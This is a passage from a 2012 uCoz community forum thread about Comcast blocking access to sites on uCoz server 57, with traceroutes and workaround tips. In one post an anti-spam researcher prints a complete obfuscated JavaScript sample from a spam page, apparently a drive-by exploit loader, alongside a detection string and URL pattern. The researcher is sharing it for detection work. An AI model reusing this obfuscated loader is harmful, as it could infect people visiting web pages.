uCoz Community » Additional Services » Account Management » Unable To Access Sites (Provider: Comcast)
Unable To Access Sites
Sunny

Message # 31 | 2:44 PM
jayar, you are not from the USA, therefore your problem is different. Please provide new tracing results.
I'm not active on the forum anymore. Please contact other forum staff.
Draggy5467

Message # 32 | 1:00 AM
The problem is indeed with Comcast. I have worked for EchoStar [DISH Network] in the past for a number of years. I work Tech support, and in the IT department and am very familiar with many issues. Comcast Tech support is not a pleasant experience, however after many traded emails with Natalya of Ucoz [which by the way is the most helpful person I've ever dealt with concerning web hosts], we figured out the issue. Most of us within the USA do use Comcast, in performing a tracert you will find that your hops stop dead at the Comcast main ternimal, Comcast has this block not Ucoz.

What it is with Ucoz they think their security is blocking and why I have no clue, however any site on server 57 is blocked by Comcast, so it wouldn't be moving a site or two, it would mean moving all of them. I've had sites with Ucoz in the past and have always had Comcast as my ISP, this problem didn't occur until I recently built a site on server 57. So the issue obviously lies within the server and the reasons unknown to the rest of us as to why Comcast is blocking it. I now have several escalation tickets into Comcast for this issue. Its coming down to having to move my sites from Ucoz to another webhost until I have the time to fire up my own webserver and built the site myself.

I'd rather pay a webhost whom I've had excellent service from for the past 6 or 7 years than move. However I can't beat a multi-billion dollar corporation in the head for not moving faster and fixing the issue, nor can we seem to get sites moved off a server that is part of the cause of the issue. Comcast claims it's Ucoz, Ucoz claims its Comcast. Truthfully your hop never gets to Ucoz, however Ucoz has apparently an unacceptable server to Comcast. There is a way to hop over Comcast altogether; torproject.org . However with this you have to log into your website every 2 or 3 minutes if you change web pages or perform posting and mailing functions. Which being an admin on a website that serves hundreds, and if we hit our old stats 5000+ every couple of weeks.

So this issue is highly unacceptable and puts many of us in bind when trying to show support for a webhost that we've watched grow, and we've grown with. But if someone can't get it under control, many of us will be webhost hunting. For those of you overseas and are lucky enough not to have to deal with Comcast..its a cable provider that has created a monopoly and cornered the cable market. After them you have satellite (Dish Network/DirectTv), Fios (fiber optic joke), and hotspots through cell carriers and often highly expensive & spotty. So this issue is affecting high volumes of people..not just those of us building sites through Ucoz but also those trying to access them. I even went as far as purchasing domains and parking them, it doesn't fix the problem however the Domain hosts love you for it.

So as one final plea can someone please figure out why server 57 and Comcast don't agree? I'd like to max out my premiums here and stay for years to come.

My email if someone would like to continue this conversation or has a better idea: draggsters@gmail.com

Sunny

Message # 33 | 2:18 PM
Draggy5467, we hope to settle this issue with Comcast and prevent further similar blockings. Concerning why it is server 57 that is being blocked - most newly created websites are hosted there, and not all users create them with good purposes, i.e. there are also malicious websites created. Of course, it is against our Terms and such websites are deleted, but some of them are probably not deleted quick enough and that might be the reason why the server is being blocked.
Sunny

Message # 34 | 10:39 AM
According to Comcast there must be no problems at the moment. Please inform whether you can access your websites.
Nicky5361

Message # 35 | 8:43 AM
I also can't access my website.
Paradox
Old Guard

Message # 36 | 8:44 AM
Nicky5361, could you please provide tracert results to your site. smile
Jack of all trades in development, design, strategy.
Working as a Support Engineer.
Been here for 13 years and counting.
Draggy5467

Message # 37 | 4:22 PM
Sunny to answer you in two ways because you got me thinking, Comcast has issued the block because of malicious sites which I am well aware given the number of sites created every hour, let alone in a week can be overwhelming for a team of 30 to sift through and delete. And Comcast will also tell you there is no problem because they blocked the entire server so from their end problem solved.

With that said and like I posted previously I've been with Ucoz too long to give up without a fight. No didn't change my ISP and currently I still can't access my website through them. However after hours and days of proxies, VPN tunneling, and software downloads I stumbled across a bit of free software that works better than if I didn't have to bypass my own ISP. UltraSurf is wicked awesome, works on all current operating systems, and is secure.

*does happy snoopy dance*

I have all my Comcast having users switching to it as I post this. Simply download the file, unzip it, and use it. No installs or anything of the sort. Comes out to 1.8mb I believe. I'm not one for promoting sites and software, however Ucoz has been our home and we aren't ready to move yet. So thanks a million Sunny and Natalya!!

http://www.ultrasurf.org/

CS

Message # 38 | 0:29 AM
Hi all, I'm an anti-spam researcher and came across this thread while researching a recent spate of spam using ucoz urls.

Over the past few days these have mainly had the format of http://[a-z]+-[a-z]+\.ucoz\.(com|org)$ but today I started seeing just alpha subdomains with ucoz.ua domains.

So far, the content at the urls is easily detectable. Just look for the string "_0x84de" (comes from off-the-shelf html/js obfuscation software, e.g. www.javascriptobfuscate.com). So if you can search new websites, just look for pages that start with a script tag and contain the referenced string. I haven't bothered de-obfuscating the JS yet, but usually when I see this type of activity, the spam is associated with drive-by exploits. HTH

Here's a recent example from today (pulled from hXXp://ameiuridaeforsy.ucoz.ua):

Code
<script language="javascript" type="text/javascript">var Ill='==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kyTPlEKkxWaoNEZuVGcwFmLsFTSKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0D IsFTSgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRX Zn9zLt92YuUGdhN2c1ZmYvlXbukGch9yL6AHd0h2Jg0DIjJ3cu80TJpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTPlEIyFmd7cSRzUCbtRHavM0MlEEMlU0MlkH ZvJ2LDNTJBBTJFNTJ2lGZvM0MlU0MlInYDNTJFNTJyJ2QzUSRzUiciN0MlU0MlInYDNTJFNTJyJ2QzUSRzUiciN0MlU0MlInYDNTJFNTJyJ2QzUSRzUiciN0MlU0MlInYDNTJFNTJyJ2 QzUSRzUiciN0MlU0MlInYDNTJFNTJyJ2QzUSRzUiciN0MlU0MlInYDNTJFNTJyJ2QzUSRzUiciN0MlU0MlInYDNTJFNTJyJ2QzUSRzUiciN0MlU0MlInYDNTJFNTJyJ2QzUSRzUiciN0 MlU0MlInYDNTJFNTJyJ2QzUSRzUiciN0MlU0MlInYDNTJFNTJyJ2QzUSRzUiciN0MlU0MlInYDNTJFNTJyJ2QzUSRzUiciN0MlU0MlInYDNTJFNTJyJ2QzUSRzUiciN0MlU0MlInYDNT JFNTJyJ2QzUSRzUiciN0MlEEMlU0MlInYDNTJFNTJyITJ0lWYXBjMlU2chVGbQJjMlQ0MlQHbhBjMlIjMlYWan5CdpF2dfV2chVGbQ9SOz8yMvMXZnFWbp9SYpRWZw9Gbjl2Yu9mbvMj MzETNxQTMxEzNwAjMiN2Xf9Cdl5mLll2av92Yv5mLhl2apdnLzMXZnFWbp9yLBNTJwRHdoJjMlQ0MlMmczBjMlcWbpN0MlU0MlInYDNTJFNTJyJ2QzUSRzUiciN0MlU0MlInYDNTJFNT JyJ2QzUSRzUiciN0MlU0MlIjMlIXZ05WZjJjMlQ0Ml42ZpxWYwITJ2lGZDNTJBBTJFNTJl1WYyZWavM0MlU0MlADRzUiclRmcvJWZtFmcmBjMlEDRzUCa0RWa3BjMlEDRzUCdodWalhG MyUiMyUCcoBnL5xmYhJ2byBXLzRmbh1WZk9yczVGbv02bj5SYzFWZylWbhx2brlmbv8SQzUCc0RHayITJENTJjJ3cwITJl1WYyZWaDNTJBBTJFNTJ5R2biN0MlEEMlU0MlIjMl4WZyIT JENTJn5WYsBjMlIjMl4WZyITJENTJn5WYsF0MlwWb4BjMlIjMlwWb0hGevkTO5EzLnJ3buMzduc3d39yLBNTJwRHdoJjMlQ0MlMnbs1GewITJs1GdoN0MlEEMlEEMlU0MlIjMlQGdk5C djlmc0NXLxwWb0hGevQEVE9SMs1Gdoh3LSR1LnJ3buMzduc3d39yLBNTJwRHdoJjMlEEMlIjMl4URv8Cdjlmc0NFMyUCMuEDMyUCTNRFSYBjMlQEVE9yLDNzVv8SLyITJwITJDlETCVF UwITJs1GdoBjMlUEUZR1QPRUMyUyQzUyJ9UGchN2cl9FIyFmd';var _0x84de=["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=","","charAt","indexOf","fromCharCode","length"];function _1IO(data){var I00lOI=_0x84de[0];var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc=_0x84de[1];do{h1=I00lOI[_0x84de[3]](data[_0x84de[2]](i++));h2=I00lOI[_0x84de[3]](data[_0x84de[2]](i++));h3=I00lOI[_0x84de[3]](data[_0x84de[2]](i++));h4=I00lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I00(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(_1IO(I00(Ill)));</script><!-- "' --><span class="pbADZqJq"><a href="http://www.ucoz.com/">Website builder</a> - <a title="Website builder" href="http://www.ucoz.com/">uCoz</a></span><div id="utbr8214" rel="s73"></div>
<!-- 0.00333 (s73) -->

Added (2012-12-07, 6:29 PM)
---------------------------------------------
BTW, here's a VT scan of that content I posted:

https://www.virustotal.com/file/70d955c9aa355f74505d48723ffaf31e5d4e46e9a4395d081ee0928f1d216d1a/analysis/1354922637/

Paradox
Old Guard

Message # 39 | 4:41 AM
Draggy5467, I will forward this software along with your recommendations on to our technical/support divisions. smile This software is sounding to prove useful as a solution until Comcast can resolve their issues. Great find. biggrin
Nicky5361

Message # 40 | 4:10 AM
Added (2012-12-09, 10:10 PM)
I deleted www.gamersdungeon.ucoz.com and made www.gamebucket.ucoz.com and I still cannot access the controllpanel or my website. I contacted Comcast, I went around in circles with them. They did know what to do, and said that it was ucoz. I just want to get into my website, www.gamebucket.ucoz.com Please help.
Post edited by Nicky5361 - Monday, 2012-12-10, 4:10 AM
Crowey

Message # 41 | 12:36 PM
hi there im having trouble with people being able to access my site thechosenguild.ucoz.net although im in the uk i have created the mentioned for intended use for or guild in a game to relay information locations and such and have come across the problem that alot of the US players are on comcast and have no access to the site.

as i love the simplicity of the site creation software and the added abilitly to put in forums amongst other things as i am new to creating a website .

after reading through the forums here i have seen that s57 is being blocked by comcast and was wondering if it is possible for you to check the site i have created and if possible for it to be moved to another server as it seems this may solve the problem for the comcast users in our guild.

i have tryed some other free web site builders over the last few days and non of them come close to what i have created using ucoz

if there is anyway around the comcast block can you please inform me.

i have also wondered about if i buy a domain can i move the website i have created on to that and will it then unblock the comcast users any information you could provide me about this would be greatly appreciated
Paradox
Old Guard

Message # 42 | 1:02 PM
Draggy5467, Nicky5361, could you both please provide tracing results to the site. So in your case Draggy the new one that makes use of the software. smile

Nicky5361, Server 57 is currently the primary server for new sites to be created on. Until Comcast resolve the problems at their end there is nothing we can do to resolve this problem any quicker. wink

Nicky5361

Message # 43 | 7:42 AM
My site adress is www.gamersdungeon.ucoz.com again the only site that I have and I have a tracing route it is
Please Help

Microsoft Windows [Version 6.1.7601]
Copyright © 2009 Microsoft Corporation. All rights reserved.

C:\Users\Nicholas>tracert www.gamersdungeon.ucoz.com

Tracing route to www.gamersdungeon.ucoz.com [193.109.247.157]
over a maximum of 30 hops:

1 <1 ms <1 ms <1 ms 192.168.1.1
2 8 ms 7 ms 9 ms 96.120.52.113
3 10 ms 8 ms 9 ms te-3-3-sr01.norton.va.knox.comcast.net [68.85.20
6.157]
4 9 ms 10 ms * 68.85.206.117
5 9 ms 11 ms 14 ms te-8-1-ur01.gladespring.va.knox.comcast.net [68.
85.206.49]
6 20 ms 11 ms 11 ms te-3-4-ur02.gray.tn.knox.comcast.net [68.85.206.
45]
7 13 ms 19 ms 19 ms te-3-2-ar01.bluelight.tn.knox.comcast.net [68.85
.206.69]
8 * * * Request timed out.
9 * * * Request timed out.
10 * * * Request timed out.
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 * * * Request timed out.
18 * * * Request timed out.
19 * * * Request timed out.
20 * * * Request timed out.
21 * * * Request timed out.
22 * * * Request timed out.
23 * * * Request timed out.
24 * * * Request timed out.
25 * * * Request timed out.
26 * * * Request timed out.
27 * * * Request timed out.
28 * * * Request timed out.
29 * * * Request timed out.
30 * * * Request timed out.

Added (2012-12-10, 11:22 PM)
I still can't get into the controllpanel, or access my website, www.gamersdungeon.ucoz.com I have tried contacting comcast, and I explained the problem as briefly as I could. I went around in circles with them, and they didn't know what I was talking about, and said it was Ucozs fault. sad

Added (2012-12-11, 1:42 AM)
I just talked to comcast thru Live Chat and they ask me to fill out an unblock form here is the URL http://postmaster.comcast.net/block-removal-request.html Every one with the problem of a blocked website thru Sever 57 should go to this website and fill out the unblock form smile
Post edited by Nicky5361 - Tuesday, 2012-12-11, 8:52 AM
Sunny

Message # 44 | 2:53 PM
Crowey, we are trying to solve this problem with Comcast. Meanwhile the websites on the blocked server can be accessed via anonymity services, e.g. TOR. Unfortunately a custom domain won't help in this case, it's the server IP that is being clocked.
Nicky5361

Message # 45 | 10:11 AM
i still can't access my site
Post edited by Nicky5361 - Wednesday, 2012-12-12, 11:07 AM
uCoz Community » Additional Services » Account Management » Unable To Access Sites (Provider: Comcast)
Search: